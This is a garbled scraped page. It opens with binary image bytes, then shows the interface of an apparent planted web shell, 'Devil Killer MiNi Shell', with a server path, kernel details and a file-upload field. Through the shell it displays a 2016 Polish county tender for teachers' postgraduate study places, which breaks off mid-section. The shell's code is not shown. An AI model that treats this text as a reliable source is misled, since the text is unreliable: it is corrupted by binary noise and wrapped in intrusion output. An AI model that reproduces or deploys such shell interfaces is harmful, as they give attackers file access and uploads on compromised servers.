JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161114/341663-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.opocznopowiat.pl' target='_blank'>www.bip.opocznopowiat.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 341663 - 2016
              z dnia 2016-11-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opoczno: Zakup miejsc na studiach podyplomowych 
dla nauczycieli szkół ponadgimnazjalnych dla których organem prowadzącym jest Powiat Opoczyński zakwalifikowanych do projektów unijnych
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Część I,II,III Projekt  Centrum Kształcenia Zawodowego i Ustawicznego szansą na sprawne połączenie wysoko  wyspecjalizowanej kadry dydaktycznej z oczekiwaniami otoczenia społeczno  gospodarczego wobec absolwentów kierunków branży mechanicznej i budowlanej   Część IV-V Projekt  Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoły   Projekty współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczyńskiego, krajowy numer identyfikacyjny
              59064843900000, ul.
              ul. Kwiatowa 
              ,
              26300  
              Opoczno, woj.
              łódzkie, państwo
              Polska, tel.
              447 361 500, e-mail
              , faks
              447 361 500.
              <br />
              Adres strony internetowej (URL): www.opocznopowiat.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.opocznopowiat.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.opocznopowiat.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a   26-300 Opoczno</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup miejsc na studiach podyplomowych 
dla nauczycieli szkół ponadgimnazjalnych dla których organem prowadzącym jest Powiat Opoczyński zakwalifikowanych do projektów unijnych
<br /><b>Numer referencyjny: </b>OZ.V.272.13.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakup 8 miejsc na studiach podyplomowych dla nauczycieli kształcenia zawodowego:5 nauczycieli zakwalifikowanych do projektu 1. Centrum Kształcenia Zawodowego i Ustawicznego szansą na sprawne połączenie wysoko  wyspecjalizowanej kadry dydaktycznej z oczekiwaniami otoczenia społeczno  gospodarczego wobec absolwentów kierunków branży mechanicznej i budowlanej oraz 3 nauczycieli Zespołu Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu 2. Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoły z podziałem na 5 części<br /><br /><b>II.5) Główny kod CPV: </b>80300000-7<br /><b> Dodatkowe kody CPV:</b>80430000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/09/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/03/2018<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/03/2018<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca musi posiadać uprawnienia do prowadzenia studiów podyplomowych, zgodnie z ustawą z dnia 27 lipca 2005r. Prawo o szkolnictwie wyższym (Dz.U.2012, poz.572 z późn. zm.)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz cenowy  wg załącznika nr 1 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin zapłaty faktury</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/11/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>STUDIA PODYPLOMOWE W ZAKRESIE DIAGNOSTYKA, MECHATRONIKA I RZECZOZNAWSTWO SAMOCHODOWE ORAZ UBEZPIECZENIA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Program studiów podyplomowych umożliwi podniesienie kompetencji zawodowych w nauczaniu przedmiotów zawodowych w zakresie: elektrotechniki i elektroniki pojazdów samochodowych ze szczególnym uwzględnieniem pojazdów ekologicznych greencars.
TEMATYKA ZAJĘĆ
Tematyka zajęć obejmuje w szczególności następujące zagadnienia: budowa i funkcjonowanie współczesnych samochodów (również rozwiązań ekologicznych) w tym mechaniki samochodowej, zagadnień bezpieczeństwa samochodu, diagnostyki i badań pojazdów, mechaniki ruchu pojazdów w złożonych sytuacjach drogowych, zagadnień prawnych i techniczno-analitycznych pracy rzeczoznawcy samochodowego, techniki komputerowej, podstawy opiniowania i opisu wypadku drogowego oraz ubezpieczeń.
WARUNKI SZCZEGÓŁOWE
1.	Liczba osób objętych studiami podyplomowymi 2 nauczycieli (0K i 2M),
2.	Czas trwania studiów 2 semestry
